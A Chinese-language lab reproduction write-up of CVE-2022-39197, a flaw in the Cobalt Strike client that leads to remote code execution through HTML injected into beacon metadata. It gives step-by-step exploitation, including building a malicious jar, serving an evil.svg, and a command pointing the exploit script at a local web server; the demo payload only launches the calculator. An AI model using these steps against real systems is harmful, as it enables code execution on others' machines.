CVE-2022-39197 复现

CVE-2022-39197

️漏洞介绍

Cobalt Strike (CS) 是一个为对手模拟和红队行动而设计的平台，相当于增强版的Armitage，早期以Metasploit为基础框架，3.0版本之后作为独立平台开发，主要用于目标攻击和模拟后渗透行动。CS集成了端口转发、服务扫描、端口监听、木马生成、钓鱼攻击等功能，可以调用Mimikatz、Psexec等工具，与MSF进行联动，使用插件扩展功能，并且可以利用Malleable C2 profile 自定义通信流量特征，是内网大杀器，十分适合作为团队协同攻击工具使用。

由于Cobalt Strike 使用 GUI 框架 SWING开发，未经身份验证的远程攻击者可通过在 beacon 元数据中注入恶意 HTML 标签，与 Cobalt Strike 进行通信时，使得CS对其进行解析时加载恶意代码，从而在目标系统上执行任意代码使得CS对其进行解析时加载恶意代码，从而在目标系统上执行任意代码。

漏洞危害

1. 导致命令执行，服务器被入侵
2. 内网被渗透，导致数据被窃取等风险
3. 用户获取到使用Cobalt Strike的攻击者的木马样本后，反制正在使用 Cobalt Strike 客户端的攻击者

受影响的版本

Cobalt Strike <= 4.7

漏洞复现

首先编辑EvilJar\src\main\java\Exploit.java恶意文件内容。出于演示就只是弹计算器

这里使用eclipse进行编译

菜单栏点击File -> 选择Export导出 -> 选择java文件夹 -> 选择底下的JAR file -> next之后在新的界面选择项目Eviljar -> browser浏览生成的位置 -> finish即可生成jar文件。将其置于serve路径下

编辑在此文件夹下的evil.svg文件，将[attacker]替换为当前路径启用的web地址

另外子要和py文件置于同一路径下

之后在serve路径下起一个web服务

要让攻击者能访问到

这边因为我物理机之前删小红伞没删干净现在老自己杀子，所以又开了一个win10虚拟机进行.运行py文件之前先安装依赖，由于我这遇到了问题就贴出来最后解决的命令

pip install -r requirements.txt http://pypi.douban.com/simple --trusted-host pypi.douban.com --no-cache-dir

之后执行脚本，等待一会就会上线

python3 cve-2022-39197.py beacon.exe http://192.168.130.23:9999/evil.svg

当cs端的攻击者查看进程列表时

滚动进度条到执行python的地方是就会向web服务请求那两个文件

等待一会之后就会弹出计算器，下线是因为那个python文件里面等待100s后就会终止